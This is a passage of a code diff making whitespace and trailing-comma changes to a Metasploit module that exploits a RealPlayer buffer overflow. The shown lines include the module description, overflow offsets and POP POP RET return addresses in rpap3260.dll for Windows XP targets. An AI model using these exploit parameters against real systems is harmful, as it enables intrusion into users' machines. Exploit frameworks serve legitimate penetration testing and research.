@@ -13,8 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
13
13
14
14
def initialize ( info = { } )
15
15
super ( update_info ( info ,
16
- 'Name' =>
17
- 'RealNetworks RealPlayer Version Attribute Buffer Overflow' ,
16
+ 'Name' => 'RealNetworks RealPlayer Version Attribute Buffer Overflow' ,
18
17
'Description' => %q{
19
18
This module exploits a stack-based buffer overflow vulnerability in
20
19
version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by
@@ -51,14 +50,14 @@ def initialize(info = {})
51
50
{
52
51
'OffsetClick' => 2540 , # Open via double click
53
52
'OffsetMenu' => 13600 , # Open via File -> Open
54
- 'Ret' => 0x641930C8 , # POP POP RET from rpap3260.dll
53
+ 'Ret' => 0x641930C8 # POP POP RET from rpap3260.dll
55
54
}
56
55
] ,
57
56
[ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.2.32' ,
58
57
{
59
58
'OffsetClick' => 2540 , # Open via double click
60
59
'OffsetMenu' => 13600 , # Open via File -> Open
61
- 'Ret' => 0x63A630B8 , # POP POP RET from rpap3260.dll
60
+ 'Ret' => 0x63A630B8 # POP POP RET from rpap3260.dll
62
61
}
63
62
]
64
63
] ,
@@ -68,7 +67,7 @@ def initialize(info = {})
68
67
69
68
register_options (
70
69
[
71
- OptString . new ( 'FILENAME' , [ false , 'The file name.' , 'msf.rmp' ] ) ,
70
+ OptString . new ( 'FILENAME' , [ false , 'The file name.' , 'msf.rmp' ] )
72
71
] ,
73
72
self . class )
74
73
0 commit comments